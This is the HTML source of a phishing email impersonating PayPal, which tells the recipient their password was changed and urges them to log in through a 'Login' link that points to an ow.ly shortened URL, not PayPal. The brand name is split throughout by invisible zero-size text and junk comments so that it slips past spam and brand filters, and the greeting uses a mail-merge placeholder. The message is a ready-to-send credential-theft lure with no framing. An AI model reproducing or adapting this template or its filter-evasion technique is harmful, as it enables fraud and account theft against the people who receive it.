<div>
<div>
<table width="580" class="MsoNormalTable" id="m_5652525118182128956emailWrapperTable" style="width: 435pt; mso-yfti-tbllook: 1184; mso-padding-alt: 0in 0in 0in 0in; mso-cellspacing: 0in;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr style="mso-yfti-irow: 0; mso-yfti-firstrow: yes;">
<td valign="top" style="padding: 0in;" colspan="3">
<table width="100%" class="MsoNormalTable" id="m_5652525118182128956emailLogo" style="width: 100%; mso-yfti-tbllook: 1184; mso-padding-alt: 0in 0in 0in 0in; mso-cellspacing: 0in;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr style="mso-yfti-irow: 0; mso-yfti-firstrow: yes;">
<td valign="top" style="padding: 0in;">
<p class="MsoNormal"><a href="https://www.paypal.com/sg" target="_blank"><span style="text-decoration: none; text-underline: none;"></span></a>&nbsp;</p></td></tr>
<tr style="mso-yfti-irow: 1;">
<td style="padding: 0in;">
<p class="MsoNormal"><br></p>
<p class="MsoNormal"><a href="https://www.paypal.com/sg" target="_blank"><span style="text-decoration: none; text-underline: none;"><img id="_x0000_i1025" alt="PayPal" src="data:image/gif;base64,…" border="0"></span></a></p></td></tr>
<tr style="mso-yfti-irow: 2; mso-yfti-lastrow: yes;">
<td style="padding: 0in;"></td></tr></tbody></table></td></tr>
<tr style="mso-yfti-irow: 1;">
<td style="padding: 0in;" colspan="3">
<p class="MsoNormal"><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'><img height="13" id="_x0000_i1027" style="vertical-align: bottom;" src="data:image/gif;base64,R0lGODlhRAINAMQAAP///8zMzNnZ2f7+/vX19dbW1vLy8uLi4s3NzeXl5djY2Ovr6/v7++Dg4P39/fr6+tPT0+Tk5Pj4+NfX19HR0ebm5uPj4+fn5/Pz8+3t7e7u7gAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAABEAg0AAAXmICCOonQJBRKsbOu+cCzPdG3feK7vfO//wKBwSCwaj8jkEFEQXCSkaBQjgEQMhIF0y+16v+CweEwum8/otHrNbrvf8Lh8Tq9zBwRDBKIweAcHChl2hIWGh4iJiouMjY6PjRoCB1pSDJOVkJqbnJ2en6ChopuAAgxRDhMJo6ytrq+wsbKzaQkTDiQNFrS8vb6/wMHCZBYNIwQFw8rLzM3Oz4QFBCICC9DX2Nna28ILAgDI3OLj5OXmiNIJFefs7e7v8CMVCQJ+8ff4+fq/BgIUD/sCChxI8NEDCggyFVzIsKFDMwMQhAAAOw==" border="0"><!--?xml:namespace prefix = "o" /--><!--?xml:namespace prefix = "o" /--><!--?xml:namespace prefix = "o" /--><!--?xml:namespace prefix = "o" /--><o:p></o:p></span></p></td></tr>
<tr style="mso-yfti-irow: 2;">
<td width="12" style="background-position: 0% 50%; border-width: medium medium medium 1pt; border-style: none none none solid; border-color: currentColor; padding: 0in; width: 9pt; mso-border-left-alt: solid #DDDDDD .75pt;">
<p class="MsoNormal"><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'><img id="_x0000_i1028" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" border="0"><o:p></o:p></span></p></td>
<td width="530" style="padding: 9pt; width: 397.5pt; -ms-word-wrap: break-word;">
<table width="100%" class="MsoNormalTable" style="width: 100%; mso-yfti-tbllook: 1184; mso-cellspacing: 1.5pt;" border="0" cellpadding="0">
<tbody>
<tr style="mso-yfti-irow: 0; mso-yfti-firstrow: yes; mso-yfti-lastrow: yes;">
<td style="padding: 0.75pt;"></td></tr></tbody></table>
<p><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'>Dear ##email##,<o:p></o:p></span></p>
<p><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'>We just wanted to confirm that you’ve changed your password. If you didn’t make this change, please login to your P<!--jdisoa--><font style="color: transparent; font-size: 0px;">s</font>a<!--doksa-->y<font style="color: transparent; font-size: 0px;">a</font><!--dsa-->P<font style="color: transparent; font-size: 0px;">a</font><!--ijd-->a<!--dksao-->l<font style="color: transparent; font-size: 0px;">s</font> account now.<o:p></o:p></span></p><u><font color="#0000ff"><a href="http://ow.ly/65Lb30kBNWp">Login</a></font></u> 
<p><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'>It’s important that you let us know because it helps us prevent unauthorised persons from accessing the P<!--kdfoas-->a<font style="color: transparent; font-size: 0px;">da</font><font style="color: transparent; font-size: 0px;">sa</font>y<!--dkaso--><!--kdosa--><font style="color: transparent; font-size: 0px;">s</font>P<!--dksao--><font style="color: transparent; font-size: 0px;">dsad</font>a<font style="color: transparent; font-size: 0px;">q</font>l<!--dksa--> network and your account information.<o:p></o:p></span></p>
<table class="MsoNormalTable" style="border: 1pt solid rgb(238, 238, 238); border-image: none; mso-yfti-tbllook: 1184; mso-padding-alt: 7.5pt 7.5pt 7.5pt 7.5pt; mso-cellspacing: 0in; mso-border-alt: solid #EEEEEE .75pt;" border="1" cellspacing="0" cellpadding="0">
<tbody>
<tr style="mso-yfti-irow: 0; mso-yfti-firstrow: yes; mso-yfti-lastrow: yes;">
<td style="padding: 7.5pt; border-image: none;">
<p class="MsoNormal"><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'>Tips to help protect your password:<o:p></o:p></span></p>
<ul type="disc">
<li class="MsoNormal" style="color: rgb(51, 51, 51); mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><span style='font-family: "Verdana",sans-serif; font-size: 8.5pt;'>Never share your password with anyone.<o:p></o:p></span></li>
<li class="MsoNormal" style="color: rgb(51, 51, 51); mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><span style='font-family: "Verdana",sans-serif; font-size: 8.5pt;'>Create passwords that are hard to guess and don’t use personal information. Be sure to include uppercase and lowercase letters, numbers and symbols.<o:p></o:p></span></li>
<li class="MsoNormal" style="color: rgb(51, 51, 51); mso-margin-top-alt: auto; mso-margin-bottom-alt: auto; mso-list: l0 level1 lfo1; tab-stops: list .5in;"><span style='font-family: "Verdana",sans-serif; font-size: 8.5pt;'>Use different passwords for each of your online accounts.<o:p></o:p></span></li></ul></td></tr></tbody></table>
<p><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'>Yours sincerely,<br>P<!--dkoas--><!--jda--><!--dkosa--><font style="color: transparent; font-size: 0px;">f</font>a<font color="#000000">yPal<!--dkosa--><!--dkas--><!--dksoa--><!--dkosa--><!--kdsao--></font></span></p></td>
<td width="12" style="background-position: 0% 50%; border-width: medium 1pt medium medium; border-style: none solid none none; border-color: currentColor; padding: 0in; width: 9pt; mso-border-right-alt: solid #DDDDDD .75pt;">
<p class="MsoNormal"><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'><img id="_x0000_i1029" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAICRAEAOw==" border="0"><o:p></o:p></span></p></td></tr>
<tr style="mso-yfti-irow: 3; mso-yfti-lastrow: yes;">
<td style="padding: 0in;" colspan="3">
<p class="MsoNormal"><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 8.5pt;'><img height="13" id="_x0000_i1030" src="data:image/gif;base64,R0lGODlhRAINAMQWAP///8zMzNnZ2eXl5fLy8vX19dbW1ubm5uDg4NfX1/7+/s3NzePj4+Li4uvr6/f399HR0e7u7v39/fv7+9TU1Pr6+v///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEAABYALAAAAABEAg0AAAXp4KIAZGmeaKqubOu+cCzPdG3feK7vfO//wKBwGFMsIBWicslsOp/QqHRKrVpXFYiAcO16v+CweEwufwmCwcHMbrvf8Lh8TjsMCga6fs/v+/+ALgYFFgIOgYiJiouMjT4OAhYWeI6VlpeYmXSDkhYIDJqhoqOkpT8MCJ0WEgkDpq+wsbKiAwkSqhYTAg2zvb6/wHANAhO4kgoIAhHBzM3Oz0QRAggKxqoECRQDBAXQ3t/g4QAFBAMUCQTW1g8HAgYB8PHy8/T19vf4+fr7/P3+/wADChxIsKDBgwgTKlzIsKFDhQYEHHigLgQAOw==" border="0"><o:p></o:p></span></p></td></tr></tbody></table>
<p class="MsoNormal"><span style="display: none; mso-hide: all;"><o:p>&nbsp;</o:p></span></p>
<table width="580" class="MsoNormalTable" id="m_5652525118182128956emailFooter" style="width: 435pt; mso-yfti-tbllook: 1184; mso-padding-alt: 15.0pt 0in 0in 0in; mso-cellspacing: 0in;" border="0" cellspacing="0" cellpadding="0">
<tbody>
<tr style="mso-yfti-irow: 0; mso-yfti-firstrow: yes; mso-yfti-lastrow: yes;">
<td style="padding: 15pt 0in 0in;">
<div style="margin-top: 3.75pt; margin-bottom: 3.75pt;">
<p class="MsoNormal"><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 7.5pt;'><a href="https://www.paypal.com/sg/cgi-bin/helpweb?cmd=_help" target="_blank">Help</a></span><span style='color: rgb(204, 204, 204); font-family: "Verdana",sans-serif; font-size: 7.5pt;'> | </span><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 7.5pt;'><a href="https://www.paypal.com/sg/security" target="_blank">Security</a><o:p></o:p></span></p></div>
<p><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 7.5pt;'>Please do not reply to this email because we are not monitoring this inbox. To get in touch with us, log in to your account and click "Contact Us" at the bottom of any page.<o:p></o:p></span></p>
<p><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 7.5pt;'>Copyright © 1999-2018 PayPal Inc. All rights reserved.<o:p></o:p></span></p>
<p><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 7.5pt;'>Consumer advisory: P<!--dkoas--><font style="color: transparent; font-size: 0px;">as</font><!--daos-->a<!--kdfoas--><font style="color: transparent; font-size: 0px;">ft</font><!--ddssa-->y<!--kdaos--><font style="color: transparent; font-size: 0px;">2e</font>P<font style="color: transparent; font-size: 0px;">oasd</font><!--dksao-->a<font style="color: transparent; font-size: 0px;">askd</font><font style="color: transparent; font-size: 0px;">aq</font>l<!--dksoa--> Pte Ltd, the Holder of the P<!--kdsoa--><font style="color: transparent; font-size: 0px;">da</font><!--kosd-->a<font style="color: transparent; font-size: 0px;">2a</font><font style="color: transparent; font-size: 0px;">as</font>y<!--dkasok--><font style="color: transparent; font-size: 0px;">0</font>P<font style="color: transparent; font-size: 0px;">sa</font><!--dksa-->a<!--dkaso--><font style="color: transparent; font-size: 0px;">sd</font>l<!--kdoas-->™ payment service stored value facility, does not require the approval of the Monetary Authority of Singapore. Consumers (users) are advised to read the <a href="https://www.paypal.com/sg/sg/cgi-bin/webscr?cmd=p/gen/ua/ua-outside" target="_blank">terms and conditions</a> carefully.<o:p></o:p></span></p>
<p class="MsoNormal"><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 7.5pt;'><img width="1" height="1" id="_x0000_i1031" src="data:image/gif;base64,R0lGODlhAgACAIAAAP///wAAACH5BAEAAAAALAAAAAACAAIAAAIChFEAOw==" border="0"><img width="1" height="1" id="_x0000_i1032" src="data:image/gif;base64,R0lGODlhAQABAID/AMDAwAAAACH5BAEAAAAALAAAAAABAAEAAAEBMgA7" border="0"><o:p></o:p></span></p>
<p class="m5652525118182128956xptfooter"><span style='color: rgb(51, 51, 51); font-family: "Verdana",sans-serif; font-size: 7.5pt;'>P<!--djasi--><font style="color: transparent; font-size: 0px;">da</font>a<!--dkaso--><font style="color: transparent; font-size: 0px;">23</font>y<!--dkas--><font style="color: transparent; font-size: 0px;">sa</font>P<font style="color: transparent; font-size: 0px;">9d</font>a<font style="color: transparent; font-size: 0px;">dsa</font><!--dkoas-->l Email ID 152E8K35S<!--?php
echo rand(100, 999);
?--></span></p></td></tr></tbody></table></div></div>
<div></div>
<p class="MsoNormal"><o:p>&nbsp;</o:p></p>
<div></div>
<div></div>